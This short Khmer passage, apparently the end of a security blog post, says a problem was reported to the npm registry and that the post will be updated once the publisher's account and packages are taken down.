បានរាយការណ៍ទៅកាន់បញ្ជីឈ្មោះ npm។ យើងនឹងធ្វើបច្ចុប្បន្នភាពប្រកាសនេះនៅពេលដែលគណនីអ្នកបោះពុម្ពផ្សាយ និងកញ្ចប់ត្រូវបានដកចេញ។




